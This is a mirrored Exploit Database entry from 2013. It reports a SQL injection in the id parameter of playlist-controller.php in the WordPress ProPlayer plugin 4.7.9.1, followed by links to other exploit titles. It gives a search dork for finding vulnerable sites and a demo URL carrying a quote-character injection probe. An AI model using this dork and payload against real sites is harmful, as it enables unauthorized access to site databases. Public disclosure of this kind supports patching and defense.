WordPress Plugin ProPlayer 4.7.9.1 – SQL Injection

Exploit Database
21 阅读

作者： Ashiyane Digital Security Team

日期： 2013-05-21
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/25605/

##############
# Exploit Title : WordPress ProPlayer Plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Plugin Link: http://wordpress.org/plugins/proplayer/
#
# Home : www.ashiyane.org
#
# Security Risk : High
#
# Version : 4.7.9.1
#
# Dork : inurl:wp-content/plugins/proplayer/playlist-controller.php?id=
#
# Tested on: Linux
#
##############
#Location:site/wp-content/plugins/proplayer/playlist-controller.php?id=[SQL]
#
#
#DEm0:
# http://server/wp-content/plugins/proplayer/playlist-controller.php?id=32-0%27
#
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############

last Exploits
WordPress Plugin ProPlayer 4.7.9.1 – SQL Injection的更多信息

TheCarProject 2 – Multiple SQL Injection：
Oxwall 1.7.4 – Cross-Site Request Forgery：
Command School Student Management System – ‘/sw/admin_subjects.php?id’ SQL Injection：
Basic B2B Script – SQL Injection：
Webmin 1.973 – ‘save_user.cgi’ Cross-Site Request Forgery (CSRF)：
Mailman 1.x > 2.1.23 – Cross Site Scripting (XSS)：
PLC Wireless Router GPN2.4P21-C-CN – Incorrect Access Control：
Altova MobileTogether Server 7.3 – XML External Entity Injection (XXE)：